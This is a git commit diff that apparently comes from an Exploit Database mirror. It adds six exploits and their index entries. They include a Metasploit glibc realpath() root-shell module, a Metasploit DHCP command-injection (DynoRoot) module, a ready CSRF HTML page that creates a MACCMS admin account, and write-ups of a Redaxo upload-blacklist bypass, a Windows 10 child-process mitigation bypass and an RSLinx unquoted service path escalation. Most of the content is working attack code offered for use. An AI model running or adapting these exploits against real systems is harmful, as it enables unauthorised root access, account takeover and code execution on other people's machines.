DB: 2018-06-14

6 changes to exploits/shellcodes Microsoft Windows 10 - Child Process Restriction Mitigation Bypass glibc - 'realpath()' Privilege Escalation (Metasploit) RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation DHCP Client - Command Injection (DynoRoot) (Metasploit) MACCMS 10 - Cross-Site Request Forgery (Add User) Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload
2018-06-14 05:01:45 +00:00 · 2018-06-14 05:01:45 +00:00 · de3b5004b9
commit de3b5004b9
parent 6d3190ddfa
7 changed files with 425 additions and 0 deletions
--- a/exploits/linux/local/44889.rb
+++ b/exploits/linux/local/44889.rb
@ -0,0 +1,200 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "glibc 'realpath()' Privilege Escalation",
      'Description'    => %q{
        This module attempts to gain root privileges on Linux systems by abusing
        a vulnerability in GNU C Library (glibc) version 2.26 and prior.
        This module uses halfdog's RationalLove exploit to exploit a buffer
        underflow in glibc realpath() and create a SUID root shell. The exploit
        has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.
        The target system must have unprivileged user namespaces enabled.
        This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)
        with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc
        version 2.24-11+deb9u1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'halfdog',      # Discovery and RationalLove.c exploit
          'Brendan Coles' # Metasploit
        ],
      'DisclosureDate' => 'Jan 16 2018',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'AKA', 'RationalLove.c' ],
          [ 'BID', '102525' ],
          [ 'CVE', '2018-1000001' ],
          [ 'EDB', '43775' ],
          [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
          [ 'URL', 'https://securitytracker.com/id/1040162' ],
          [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
          [ 'URL', 'https://usn.ubuntu.com/3534-1/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]
        ],
      'DefaultTarget'  => 0))
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end
  def base_dir
    datastore['WritableDir'].to_s
  end
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
    register_file_for_cleanup path
  end
  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end
  def upload_and_compile(path, data)
    upload "#{path}.c", data
    gcc_cmd = "gcc -w -o #{path} #{path}.c"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end
    register_file_for_cleanup path
    cmd_exec "chmod +x #{path}"
  end
  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end
  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end
    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end
  def check
    version = kernel_release
    if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36')
      vprint_error "Linux kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Linux kernel version #{version} is vulnerable"
    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"
    unless userns_enabled?
      vprint_error 'Unprivileged user namespaces are not permitted'
      return CheckCode::Safe
    end
    vprint_good 'Unprivileged user namespaces are permitted'
    version = glibc_version
    if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26')
      vprint_error "GNU C Library version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "GNU C Library version #{version} is vulnerable"
    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
    glibc_banner = cmd_exec('ldd --version')
    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
      vprint_error 'No offsets for this version of GNU C Library'
      return CheckCode::Safe
    end
    CheckCode::Appears
  end
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end
    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    @executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile @executable_path, exploit_data('RationalLove.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx @executable_path, exploit_data('RationalLove')
    end
    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe
    # Launch exploit
    print_status 'Launching exploit...'
    output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30
    output.each_line { |line| vprint_status line.chomp }
  end
  def on_new_session(client)
    # remove root owned SUID executable
    if client.type.eql? 'meterpreter'
      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
      client.fs.file.rm @executable_path
    else
      client.shell_command_token "rm #{@executable_path}"
    end
  end
 end
--- a/exploits/linux/remote/44890.rb
+++ b/exploits/linux/remote/44890.rb
@ -0,0 +1,67 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::DHCPServer
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
      'Description'    => %q{
        This module exploits the DynoRoot vulnerability, a flaw in how the
         NetworkManager integration script included in the DHCP client in
         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
         processes DHCP options. A malicious DHCP server, or an attacker on
         the local network able to spoof DHCP responses, could use this flaw
         to execute arbitrary commands with root privileges on systems using
         NetworkManager and configured to obtain network configuration using
         the DHCP protocol.
      },
      'Author'         =>
        [
          'Felix Wilhelm', # Vulnerability discovery
          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'References'     =>
        [
          ['AKA', 'DynoRoot'],
          ['CVE', '2018-1111'],
          ['EDB': '44652'],
          ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
          ['URL', 'https://dynoroot.ninja/'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
          ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
        ],
      'Targets'        => [ [ 'Automatic Target', { }] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 15 2018'
    ))
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
  end
  def exploit
    hash = datastore.copy
    start_service(hash)
    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
    begin
      while @dhcp.thread.alive?
        sleep 2
      end
    ensure
      stop_service
    end
  end
 end
--- a/exploits/php/webapps/44887.html
+++ b/exploits/php/webapps/44887.html
@ -0,0 +1,28 @@
 # Exploit Title: MACCMS_V10 CSRF vulnerability add admin account
 # Date: 2018-06-11 
 # Exploit Author: bay0net
 # Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9168309.html
 # Software Link: http://www.maccms.com/down.html
 # Version: V10
 # CVE : CVE-2018-12114
 I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users.
 The payload for attack is as follows.
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/exploits/php/webapps/44891.txt
+++ b/exploits/php/webapps/44891.txt
@ -0,0 +1,22 @@
 # Exploit Title: Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload
 # Date: 2018-06-13
 # Exploit Author: mn@HackerWerkstatt
 # Vendor Homepage: https://redaxo.org
 # Software Link: https://redaxo.org/download/redaxo/5.5.1.zip
 # Version: 5.5.1 and older
 # Tested on: LinuxMint
 # More: Login required
 ### PoC ###
 In the REDAXO CMS under version 5.6.0 the mediapool addon is vuln. Users who have an user-account, like editor, 
 can use the mediapool to upload files. The mediapool addon under version 2.4.0 uses a blacklist for fileupload. 
 For users it isn't possible upload files named: php, php4, php5, php6 or php7.
 But, if you name the files like php71 or php53 the blacklist-function ignore this and upload of shellcode-file is possible.
 https://example.com/redaxo/index.php?page=mediapool/media
 ### Fixed in mediapool 2.4.0 and Redaxo CMS 5.6.0
 ### reported: 08.03.2018
 ### fixed: 08.06.2018
--- a/exploits/windows/local/44888.txt
+++ b/exploits/windows/local/44888.txt
@ -0,0 +1,58 @@
 Windows: Child Process Restriction Mitigation Bypass
 Platform: Windows 10 1709 (not tested other versions)
 Class: Security Feature Bypass
 Summary:
 It’s possible to bypass the child process restriction mitigation policy by impersonating the anonymous token leading to a security feature bypass.
 Description:
 Windows 10 has a mitigation policy to restrict a process creating new child processes. I believe the main rationale is to prevent escaping some of the other mitigations which are not inherited across to new child processes as well as bugs which can only be exploiting from a fresh process. The policy is enforced as a flag in the token rather than on the process which allows the restriction to be passed across process boundaries during impersonation, which would also kill abusing WMI Win32_Process and similar.
 During process creation the token flag is checked in SeSubProcessToken which creates the new primary token for the new process. It’s possible to also specify a flag for overriding the behavior, the code looks something like the following:
 if (ChildProcessOptions & PROCESS_CREATION_CHILD_PROCESS_OVERRIDE)
 {
    PTOKEN CurrentToken = PsReferenceEffectiveToken(
            KeGetCurrentThread(),
            &Type,
            &CopyOnOpen,
            &ImpersonationLevel);
    if ( Type == TokenImpersonation && ImpersonationLevel < SecurityImpersonation 
      || (SeTokenIsNoChildProcessRestrictionEnforced(CurrentToken) != 0 && Type != TokenPrimary))
    {
      return STATUS_CHILD_PROCESS_BLOCKED;
    }
 }
 This checks if the PROCESS_CREATION_CHILD_PROCESS_OVERRIDE is set then either the primary or impersonation token do not have the restrict child process flag set. If the token does have the flag then STATUS_CHILD_PROCESS_BLOCKED is returned and process creation fails. The problem with this code is it entirely relies on a process not being able to get an impersonation token without the flag. For a normal user process this would be trivial (of course it’s trivial to bypass this restriction from a normal process anyway) but from an AppContainer it should be much more difficult.
 There is an easy token we can impersonate which doesn’t have the flag set, the Anonymous token. The problem with this is if we impersonate over the entire process creation then it will fail because the kernel will not be able to open the target executable. Fortunately the check for child process creation is after opening the file so we can abuse oplocks and from a separate thread assign the impersonation token while the thread is still running kernel code. So the following steps can be used to create an arbitrary child process:
 1. Place an oplock on the image file for the process we want to create and wait for completion.
 2. In a separate thread create a new process with the desired image file.
 3. Once oplock has completed impersonate the anonymous token on the thread calling create process. Release oplock.
 4. Original thread should continue process creation and check the anonymous token for the restricted flag bypassing the mitigation.
 Note that you could probably also abuse the conhost creation inside ConDrv as that runs with kernel permissions so won’t actually care about the anonymous token but it would be nicer to demonstrate this bypass with an arbitrary process. 
 From a fixing perspective I’m not entirely clear what the purpose of checking the impersonation token is. I’m guessing it’s supposed to allow a secondary process without restriction to use a process which has the restriction as a parent process using a process attribute. In that case perhaps you need a check that the parent process attribute is set and we’re not being called from the same process or something similar so that only that use case can pass the override flag.
 Proof of Concept:
 I’ve provided a PoC as a C# project. It will first respawn itself into an AppContainer with the child process restriction mitigation enabled. The use of a AppContainer shows that this would be normally much more difficult to circumvent as you can’t just open other processes. It will then use the outlined attack to bypass the restriction and respawn itself a second time. If successful there should be three copies of the poc running, two with child process creation restrictions inside an AppContainer.
 1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
 2) Apply the ALL_APPLICATIONS_PACKAGES Read/Execute ACE to the POC’s directory otherwise respawning as an AC will not work.
 2) Execute the PoC
 Expected Result:
 The second process should fail to create a new process.
 Observed Result:
 The second process creates a new process and the third process in the chain shows a Hello message box.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44888.zip
--- a/exploits/windows/local/44892.txt
+++ b/exploits/windows/local/44892.txt
@ -0,0 +1,44 @@
 # Title: RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation
 # Date: 2017-12-11
 # Author: LiquidWorm
 # Vendor: Rockwell Automation, Inc.
 # Product web page: https://www.rockwellautomation.com
 # Affected version: Rockwell Automation RSLinx Classic 3.90.01
 #                 Rockwell Automation RSLinx Classic 3.73.00
 #                 Rockwell Automation RSLinx Classic 3.72.00
 #                 Rockwell Automation RSLinx Classic 2.58.00
 #                 Rockwell Automation FactoryTalk Linx Gateway 3.90.00
 # CVE: CVE-2018-10619
 # Tested on: Microsoft Windows 7 Professional SP1 (EN)
 # Summary: 
 # The FactoryTalk Linx Gateway adds a Classic OPC DA and OPC UA server
 # interface to deliver information collected by FactoryTalk Linx from Logix5000™
 # and other Allen-Bradley® controllers to external OPC clients, permitting
 # third-party software to coexist with FactoryTalk® software.
 # PoC: 
 The application suffers from an unquoted search path issue impacting
 the service 'dnwhodisp' for Windows deployed as part of RSLinx and FactoryTalk.
 This could potentially allow an authorized but non-privileged local user to
 execute arbitrary code with elevated privileges on the system. 
 A successful attempt would require the local user to be able to insert their 
 code in the system root path undetected by the OS or other security applications
 where it could potentially be executed during application startup or reboot. If
 successful, the local user's code would execute with the elevated privileges
 of the application.
 C:\>sc qc dnwhodisp
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: dnwhodisp
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Rockwell Software\RSLINX\dnwhodisp.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : dnWhoDisp
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9777,6 +9777,9 @@ id,file,description,date,author,type,platform,port
 41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
 44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,
 44888,exploits/windows/local/44888.txt,"Microsoft Windows 10 - Child Process Restriction Mitigation Bypass",2018-06-13,"Google Security Research",local,windows,
 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16564,6 +16567,7 @@ id,file,description,date,author,type,platform,port
 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection (DynoRoot) (Metasploit)",2018-06-13,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39546,3 +39550,5 @@ id,file,description,date,author,type,platform,port
 44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
 44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
 44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,